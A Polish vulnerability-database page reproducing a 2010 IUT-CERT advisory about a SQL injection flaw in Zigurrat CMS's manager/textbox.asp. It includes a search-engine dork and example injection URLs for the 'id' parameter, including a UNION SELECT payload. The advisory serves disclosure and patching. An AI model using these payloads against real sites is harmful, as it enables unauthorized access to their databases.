Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
WLB
Audyt
RSS
Zespół
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl

Strona główna arrow Baza WLB          

  Tytuł : Zigurrat CMS SQL injection vulnerability
  WLB : WLB-2010030088  (Szczegóły)
  Data publikacji : 2010-03-20
  Autor          : Isfahan
  Poziom ryzyka : Średni  Poziom Średni  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Nie
  Status   : Bład

  Historia :
[2010-03-20] Publikacja

  Podatne oprogramowanie :  

Zigurrat CMS


  Tekst :  

================= IUT-CERT =================

Title: Zigurrat CMS SQL Injection Vulnerability

Vendor: www.farsi-cms.com

Dork: Design by Tagfa Co
Type: Input.Validation.Vulnerability (SQL Injection)

Fix: N/A

================== nsec.ir =================

Description:

------------------

Zigurrat CMS is a CMS producer in Iran. "manager/textbox.asp" pages in Pars
CMS

product are vulnerable to SQL Injection vulnerability.

Vulnerability Variant:

------------------
Injection "manager/textbox.asp" in "id" parameter.

http://www.example.com/manager/textbox.asp?id='

http://www.example.com/manager/textbox.asp?id=0'

http://www.example.com/manager/textbox.asp?id=%2527

http://www.example.com/manager/textbox.asp?id='

http://www.example.com/manager/textbox.asp?id=<number> UNION SELECT *FROM
VALIDTBLNAME'

Solution:

------------------

Input validation of Parameter "id" should be corrected.

Credit:

------------------

Isfahan University of Technology - Computer Emergency Response Team

Thanks to : M. Fereidounian, M. R. Faghani, N. Fathi,E. Jafari

  Referencje :  

None


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP


Apache rss
PHP rss
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain

Copyright © SecurityReason. All Rights Reserved.